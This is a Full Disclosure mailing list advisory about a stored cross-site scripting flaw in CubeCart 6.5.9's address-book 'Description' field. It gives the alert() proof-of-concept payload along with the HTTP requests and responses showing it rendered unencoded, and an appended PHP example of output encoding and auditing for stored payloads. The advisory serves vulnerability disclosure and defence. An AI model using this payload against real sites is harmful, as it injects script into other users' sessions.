Message-ID: <CAF2Wu1btnheddDmHKos25sQytHJxmQZDrmp9M_U+4XBM2RxQJA@mail.gmail.com>
Date: Fri, 30 May 2025 00:04:32 +0100
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Stored XSS in "Description" Functionality - cubecartv6.5.9

# Exploit Title: Stored XSS in "Description" Functionality - cubecartv6.5.9
# Date: 05/2025
# Exploit Author: Andrey Stoykov
# Version: 6.5.9
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/


Stored XSS #1:

Steps to Reproduce:

1. Visit "Account" > "Address Book" and choose "Edit"
2. In the "Description" parameter, enter the following payload:
<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">


// HTTP POST Request

POST /cubecart/index.php?_a=addressbook&action=edit&address_id=1 HTTP/1.1
Host: 192.168.58.186
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
[...]

------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6
Content-Disposition: form-data; name="description"

<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">
------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6
Content-Disposition: form-data; name="title"
[...]


// HTTP Response

HTTP/1.1 302 Found
Date: Sun, 18 May 2025 12:16:17 GMT
Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12 Perl/v5.34.1
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.2.4
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]


// HTTP GET Request

GET /cubecart/index.php?_a=addressbook HTTP/1.1
Host: 192.168.58.186
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 18 May 2025 12:16:41 GMT
Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12 Perl/v5.34.1
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.2.4
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: CC_1349B74620=k6fd07i7h211fg1d69p5mvkuru;Expires=Monday, 19-May-2025 12:16:41 UTC;Domain=.192.168.58.186;Path=/cubecart;HttpOnly
Vary: Accept-Encoding
Content-Length: 42139
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[...]
<div class="small-12 columns"><h5><a href="?_a=addressbook&action=edit&address_id=1"><iframe><textarea></iframe><img src="" onerror="alert(document.domain)"></a></h5></div>
[...]
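As an added example that is not part of the advisory or of CubeCart's own code: the response above echoes the stored description unencoded inside the <a> text of the address list, so the defensive fix is contextual output encoding at the point of rendering. The PHP below (function names are assumptions) renders the same markup with the description and href encoded, and includes an audit helper for records stored before the fix, since a stored payload persists in the database until the record is cleaned.

```php
<?php
// Added example, not CubeCart code. Demonstrates output encoding for the
// address-book "description" value that the advisory shows echoed raw inside
// <div class="small-12 columns"><h5><a href="..."> on the addressbook page.
declare(strict_types=1);

// Encode a value for an HTML text node or double-quoted attribute context.
function html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened rendering of the edit link seen in the advisory's response body.
// address_id is an int before it reaches the URL; description is encoded, so
// "<iframe><textarea>..." becomes "&lt;iframe&gt;&lt;textarea&gt;..." and the
// browser shows text instead of creating elements or running onerror.
function render_address_link(int $addressId, string $description): string
{
    $href = '?_a=addressbook&action=edit&address_id=' . $addressId;
    return '<div class="small-12 columns"><h5><a href="' . html_encode($href) . '">'
        . html_encode($description)
        . '</a></h5></div>';
}

// Audit helper: flag already-stored descriptions that contain markup so they
// can be reviewed and cleaned after the encoding fix is deployed. Any "<"
// followed by a tag-like character is enough to warrant a look; a plain
// address label has no reason to contain one.
function find_suspicious_descriptions(array $rows): array
{
    $flagged = [];
    foreach ($rows as $row) {
        if (preg_match('/<[a-z!\/?]/i', $row['description']) === 1) {
            $flagged[] = $row['address_id'];
        }
    }
    return $flagged;
}

// Constructed sample rows; the second carries the payload from the advisory.
$rows = [
    ['address_id' => 1, 'description' => 'Home'],
    ['address_id' => 2, 'description' => '<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">'],
];

echo render_address_link(2, $rows[1]['description']), PHP_EOL;
var_dump(find_suspicious_descriptions($rows));
```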
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/